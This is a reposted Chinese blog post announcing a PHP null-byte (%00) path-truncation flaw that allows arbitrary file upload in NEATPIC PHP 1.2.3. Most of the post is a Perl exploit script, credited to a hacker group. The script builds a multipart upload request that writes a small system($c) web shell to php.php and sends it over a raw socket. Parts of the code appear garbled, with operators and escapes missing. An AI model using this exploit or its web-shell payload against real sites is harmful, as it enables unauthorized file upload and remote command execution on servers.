PHP網站警報,多種PHP程式過濾漏洞(轉)
PHP網站警報,多種PHP程式過濾漏洞(轉)[@more@] 危害:直接上傳任意檔案 漏洞描述: 當PHP程式有指定PATH時,在PATH檔案後門加入%00可以上傳任意檔案. 測試程式:NEATPIC PHP目錄直讀版 1.2.3 此文件參與者: 漏洞實驗者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members] Xiaolu提供了一個漏洞利用程式: #!/usr/bin/perl $ = 1; use Socket; $host = "127.0.0.1"; $port = "80"; $UploadTo = ""; $str = "-----------------------------7d41f4a600472
". "Content-Disposition: form-data; name="path"
". "
". "./php.php%00
". "-----------------------------7d41f4a600472
". "Content-Disposition: form-data; name="image"; filename= "F: ools1.gif"
". "Content-Type: text/plain
". "
". ""system($c);
". "?>
". "-----------------------------7d41f4a600472--
". "
"; print $str; $len=length($str); print $len; $req ="POST /index.php?action=upload HTTP/1.1
". "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*
". "Referer:
". "Accept-Language: zh-cn
". "Content-Type: multipart/form-data; boundary=---------------- -----------7d41f4a600472
". "Accept-Encoding: gzip, deflate
". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)
". "Host: 127.0.0.1
". "Content-Length: $len
". "Connection: Keep-Alive
". "Cache-Control: no-cache
". "Cookie: PHPSESSID=111111111111111111111111
". "
". "$str
"; print $req; @res = sendraw($req); print @res; #Hmm...Maybe you can send it by other way sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) die("inet_aton problems
"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') 0) die("Socket problems
"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $ = 1; print $req; my @res = ; select(STDOUT); close(S); return @res; } else { die("Can't connect...
"); } }
·上一篇:·下一篇:
最新更新 | ||
······························ |
| ||
| | | | | | | | ||
| ||
Copyright © 2004 - 2007 All Rights Reserved
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10763080/viewspace-970190/,如需轉載,請註明出處,否則將追究法律責任。
上一篇:
菜鳥必看:釋出駭客最初步的技術(轉)
![]()
請登入後發表評論
登入
全部評論
|
相關文章
- 【安全公告】PHP多個遠端程式碼執行漏洞風險預警PHP
- 網站漏洞測試php程式碼修復詳情網站PHP
- PHP 過濾器(Filter)PHP過濾器Filter
- php過濾html標籤、特殊字元、轉義字元PHPHTML字元
- 用 PHP 玩轉程式之二 — 多程式 PHPServerPHPServer
- XAMPP Windows PHP-CGI 程式碼執行漏洞(CVE-2024-4577) | Goby漏洞預警WindowsPHPGo
- PHP實現布隆過濾器PHP過濾器
- PHP Everywhere 三個 RCE 漏洞威脅大量 WordPress 網站PHP網站
- 探索 PHP 多程式PHP
- 網站安全防護-PHP反序列化漏洞修復網站PHP
- PHP基礎之過濾器講解PHP過濾器
- PHP中很屌但經常被各種忽略的過濾器函式PHP過濾器函式
- php 網站修改製作,全面更新PHP網站內容和設計PHP網站
- PHP漏洞全解————10、PHP檔案包含漏洞PHP
- php無法正常修改網站,如何排查和解決PHP網站修改問題PHP網站
- PHP程式報錯:PHP Notice: Undefined index: XX inPHPUndefinedIndex
- php多程式管理器PHP
- 用Docker執行Nginx和多個版本PHP部署網站DockerNginxPHP網站
- PHP 對資料進行驗證和過濾PHP
- 如何過濾掉 PHP 陣列中的空值?PHP陣列
- php網站admin密碼修改?PHP網站密碼
- 玩轉 PHP 網路程式設計全套之多程式程式設計PHP程式設計
- php:多程式執行任務PHP
- PHP 多程式處理任務PHP
- 「說技術」 PHP如何從字串中過濾出中文PHP字串
- 實現dnmp中多站點多版本php並存PHP
- php網站資料庫連線PHP網站資料庫
- 玩轉 PHP 網路程式設計之原理篇PHP程式設計
- 利用PHP擴充套件Taint找出網站的潛在安全漏洞實踐PHP套件AI網站
- 網站存在漏洞怎麼修復 如何修補網站程式程式碼漏洞網站
- php網站的html檔案在哪修改,如何找到並編輯PHP網站的HTML檔案PHP網站HTML
- 多程式PHP指令碼實現海量資料轉移總結PHP指令碼
- PHP -Casbin: 支援 ACL、RBAC、ABAC 多種模型的 PHP 許可權管理框架PHP模型框架
- PHP審計之PHP反序列化漏洞PHP
- [程式碼審計]php上傳漏洞總結PHP
- 網站漏洞檢測解析繞過上傳漏洞網站
- PHP 的多程式與執行緒PHP執行緒
- php網站預設起始頁頁面修改,如何輕鬆更新PHP網站的預設起始頁PHP網站
- 玩轉 PHP 網路程式設計全套之 socket stream 程式設計PHP程式設計